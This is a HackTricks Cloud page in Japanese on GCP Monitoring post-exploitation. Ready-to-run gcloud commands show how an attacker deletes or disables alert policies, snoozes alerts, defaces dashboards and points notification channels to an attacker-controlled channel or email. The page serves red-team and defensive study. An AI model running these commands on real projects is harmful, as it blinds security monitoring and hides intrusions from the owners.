GCP - モニタリングポストエクスプロイテーション

Reading time: 4 minutes

tip

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する：HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

モニタリング

詳細については、次を確認してください:

GCP - Monitoring Enum

ログを妨害する他の方法については、次を確認してください:

GCP - Logging Post Exploitation

`monitoring.alertPolicies.delete`

アラートポリシーを削除します:

bash

gcloud alpha monitoring policies delete <policy>

`monitoring.alertPolicies.update`

アラートポリシーを中断する:

bash

# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled

# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels

# Chnage notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>

`monitoring.dashboards.update`

ダッシュボードを変更して妨害する：

bash

# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''

`monitoring.dashboards.delete`

ダッシュボードを削除します:

bash

# Delete dashboard
gcloud monitoring dashboards delete <dashboard>

`monitoring.snoozes.create`

アラートを生成するポリシーを防ぐためにスヌーザーを作成します：

bash

# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
--start-time="2023-03-01T03:00:00.0-0500" \
--end-time="2023-03-07T23:59:59.5-0500"

`monitoring.snoozes.update`

攻撃者が興味を持っているときにアラートが作成されないように、スヌーザーのタイミングを更新します:

bash

# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME

# odify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>

`monitoring.notificationChannels.delete`

構成されたチャネルを削除します:

bash

# Delete channel
gcloud alpha monitoring channels delete <channel>

`monitoring.notificationChannels.update`

チャネルのラベルを更新して中断します:

bash

# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com

tip

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

HackTricks Cloud